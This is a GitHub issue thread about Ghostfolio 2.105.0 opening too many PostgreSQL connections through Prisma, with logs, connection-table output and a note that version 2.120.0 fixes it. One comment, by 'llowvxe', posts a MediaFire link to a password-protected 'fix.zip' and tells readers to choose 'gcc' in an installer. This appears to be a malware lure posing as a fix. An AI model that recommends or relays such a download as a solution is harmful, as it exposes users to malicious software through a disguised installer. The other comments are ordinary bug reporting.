### ISSUE TITLE
[BUG] Too many database connections opened: FATAL: sorry, too many clients already

### ISSUE THREAD

**Issue by ondrejkopka** [ghostfolio/ghostfolio#3700]
**Bug Description**

After upgrading to 2.105.0, Ghostfolio stopped working on my server because of this:
[Nest] 153  - 08/26/2024, 6:16:42 AM   ERROR [ExceptionsHandler]
Invalid `prisma.marketData.findFirst()` invocation:

Too many database connections opened: FATAL: sorry, too many clients already
Prisma Accelerate has built-in connection pooling to prevent such errors: https://pris.ly/client/error-accelerate
PrismaClientKnownRequestError:
Invalid `prisma.marketData.findFirst()` invocation:

Too many database connections opened: FATAL: sorry, too many clients already
Prisma Accelerate has built-in connection pooling to prevent such errors: https://pris.ly/client/error-accelerate
    at _n.handleRequestError (/ghostfolio/apps/api/node_modules/@prisma/client/runtime/library.js:121:7749)
    at _n.handleAndLogRequestError (/ghostfolio/apps/api/node_modules/@prisma/client/runtime/library.js:121:7057)
    at _n.request (/ghostfolio/apps/api/node_modules/@prisma/client/runtime/library.js:121:6741)
    at async l (/ghostfolio/apps/api/node_modules/@prisma/client/runtime/library.js:130:9355)
    at async MarketDataService.get (/ghostfolio/apps/api/main.js:1:298633)
    at async ExchangeRateDataService.toCurrencyAtDate (/ghostfolio/apps/api/main.js:1:311109)
    at async /ghostfolio/apps/api/main.js:1:404595
    at async Promise.all (index 73)
    at async OrderService.getOrders (/ghostfolio/apps/api/main.js:1:404366)
    at async PortfolioService.getPerformance (/ghostfolio/apps/api/main.js:1:492306)
[Nest] 153  - 08/26/2024, 6:16:43 AM   ERROR [ExchangeRateDataService] No exchange rate has been found for EURCZK at 2024-03-04
[Nest] 153  - 08/26/2024, 6:16:43 AM   ERROR [ExchangeRateDataService] No exchange rate has been found for EURCZK at 2024-07-18

It happens instantly after docker container start

**Environment**

- Ghostfolio Version 2.105.0
- Self-hosted
- Experimental Features enabled
- Firefox 129.0.2
- Debian Bookworm (12.7)

Cannot log to psql to see running queries as i don't have access to superuser, downgrade to 2.104.1 instantly fixes it

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ondrejkopka** [comment]
same thing happens with last release, some additional info i just gathered:
```
ghostfolio-db=# select count(*) from pg_stat_activity ;
-[ RECORD 1 ]
count | 105
```

all queries are like this:
```
datid            | 16384
datname          | ghostfolio-db
pid              | 46
usesysid         | 10
usename          | user
application_name |
client_addr      | 192.168.160.4
client_hostname  |
client_port      | 52352
backend_start    | 2024-09-19 18:16:04.165132+00
xact_start       |
query_start      | 2024-09-19 18:16:51.44177+00
state_change     | 2024-09-19 18:16:51.441936+00
wait_event_type  | Client
wait_event       | ClientRead
state            | idle
backend_xid      |
backend_xmin     |
query            | SELECT "public"."MarketData"."id", "public"."MarketData"."createdAt", "public"."MarketData"."dataSource"::text, "public"."MarketData"."date", "public"."MarketData"."marketPrice", "publi
c"."MarketData"."state"::text, "public"."MarketData"."symbol" FROM "public"."MarketData" WHERE ("public"."MarketData"."dataSource" = CAST($1::text AS "public"."DataSource") AND "public"."MarketData"."symb
ol" = $2 AND "public"."MarketData"."date" = $3) LIMIT $4 OFFSET $5
backend_type     | client backend
```

after downgrade to 2.104.0 application works again properly

**Comment by ondrejkopka** [comment]
i saw many stuck entries in job queue so i deleted them and tried to use 2.112.0 but without luck

any chance to fix this please?

**Comment by ondrejkopka** [comment]
stacktrace of one of those jobs is like this:
```
[ "Error: Error: Could not get historical market data for USDEUR (YAHOO) from 2020-01-02 to 2024-10-04: [HTTPError] Unauthorized\n at DataGatheringProcessor.gatherHistoricalMarketData (/ghostfolio/apps/api/main.js:1:370018)\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)", "Error: Error: Could not get historical market data for USDEUR (YAHOO) from 2020-01-02 to 2024-10-04: [HTTPError] Unauthorized\n at DataGatheringProcessor.gatherHistoricalMarketData (/ghostfolio/apps/api/main.js:1:370018)\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)" ]
```

**Comment by ondrejkopka** [comment]
not happening in 2.120.0 -> closing

**Comment by reddai75** [comment]
Hello! Is there any chance to bump the latest version to Umbrel OS ? The version available in Umbrel's market place is still running on the 2.105
many thanks!
> not happening in 2.120.0 -> closing
